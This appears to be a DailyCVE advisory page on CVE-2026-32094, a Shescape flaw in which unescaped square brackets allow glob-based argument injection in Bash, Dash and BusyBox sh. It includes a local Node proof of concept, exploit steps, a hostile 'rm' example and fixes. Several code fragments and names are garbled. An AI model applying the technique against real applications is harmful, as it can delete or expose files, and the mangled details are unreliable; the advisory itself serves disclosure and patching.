Shescape, Argument Injection via Unescaped Glob Syntax, CVE-2026-32094 (Medium)

Listen to this Post

The vulnerability exists in Shescape versions prior to 2.1.10 because the `escape()` function fails to escape square brackets ([ and ]) for the Bash, BusyBox sh, and Dash shells . When processing untrusted input containing patterns like secret

</code>, the library correctly escapes other special characters such as `` and `?` but leaves the brackets untouched. This occurs because the internal Unix escape helper regexes in <code>src/internal/unix/bash.js</code>, <code>busybox.js</code>, and `dash.js` do not include brackets in their list of special characters to escape. Consequently, when an application interpolates the returned value directly into a shell command string, the shell interprets the brackets as a glob pattern. The shell then performs pathname expansion, matching any files in the working directory that fit the pattern (e.g., `secret1` and <code>secret2</code>). This transforms what should be a single literal argument into multiple file path arguments, leading to argument injection. The project's own test fixtures confirm this behavior by expecting literal brackets for these specific shells. The official documentation recommends using `Shescapeescape()` as a fallback for `exec()` when quoting is not possible, which increases the likelihood of vulnerable usage patterns .

<h2 style="color: blue;">dailycve form:</h2>

Platform: Node.js
Version: 2.1.9
Vulnerability :Argument Injection
Severity: Medium
date: March 11, 2026

<h2 style="color: blue;">Prediction: Patched in 2.1.10</h2>

<h2 style="color: blue;">What Undercode Say:</h2>

<h2 style="color: blue;">Analytics:</h2>

The vulnerability affects any application using `Shescapeescape()` with Bash, BusyBox sh, or Dash shells where the output is concatenated into a shell command string. The flaw exists because the escape function handles globbing characters inconsistently.

<h2 style="color: blue;">Bash Commands and PoC:</h2>

[bash]
Create a temporary directory and set up vulnerable environment
tmp=$(mktemp -d)
cd "$tmp"
Download the vulnerable package (version 2.1.9)
npm pack [email protected] >/dev/null
mkdir pkg
tar -xzf shescape-2.1.9.tgz -C pkg
cd pkg/package
npm install --omit=dev
Create test files that will match the glob pattern
mkdir test_dir
cd test_dir
touch secret1 secret2
Run the proof of concept
node --input-type=module - <<'NODE'
import { mkdtempSync, writeFileSync } from "node:fs";
import { tmpdir } from "node:os";
import path from "node:path";
import { execSync } from "node:child_process";
import { Shescape } from "../src/index.js";
const dir = mkdtempSync(path.join(tmpdir(), "shescape-poc-"));
writeFileSync(path.join(dir, "secret1"), "");
writeFileSync(path.join(dir, "secret2"), "");
for (const shell of ["/usr/bin/bash", "/usr/bin/dash"]) {
const shescape = new Shescape({ shell });
const escaped = shescape.escape("secret[bash]");
console.log(<code>${shell} escaped=${escaped}</code>);
const out = execSync(<code>printf '<%s>\\n' ${escaped}</code>, { cwd: dir, shell }).toString();
process.stdout.write(out);
}
NODE
Output shows <secret1> and <secret2> instead of <secret[bash]>

How Exploit:

1. Attacker controls input string (e.g., `secret[bash]`).

2. Application calls `Shescape.escape()` on this input.

  1. The function returns the string without escaping the brackets.
  2. Application interpolates result into a shell command: ls -l {escaped}.

5. Shell interprets `secret[bash]` as a glob pattern.

  1. If files named `secret1` and `secret2` exist, they are passed as separate arguments.
  2. This changes the command behavior from operating on one file to operating on multiple files.

Protection from this CVE:

  • Immediate Fix: Update Shescape to version 2.1.10 or later .
  • Code Change: If unable to upgrade, manually escape square brackets by replacing `[` with `\[` and `]` with `\]` before passing input to escape().
  • Avoidance: Use `Shescape.quote()` instead of `escape()` when possible, or avoid concatenating escaped values directly into shell command strings.
  • Workaround: Ensure untrusted input is always the last argument to minimize the impact of expansion.

Impact:

Successful exploitation allows an attacker to turn a single controlled argument into multiple arguments by leveraging filesystem pathname expansion. This can lead to:
- Information Disclosure: Leaking filenames through command output if the expanded arguments are reflected in results.
- Unintended File Operations: Deleting, reading, or modifying unintended files if the command operates on multiple files (e.g., `rm {escaped}` could delete `secret1` and `secret2` instead of just secret[bash]).
- Command Behavior Alteration: Changing the logic of commands that interpret multiple arguments differently than a single argument.

References:

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top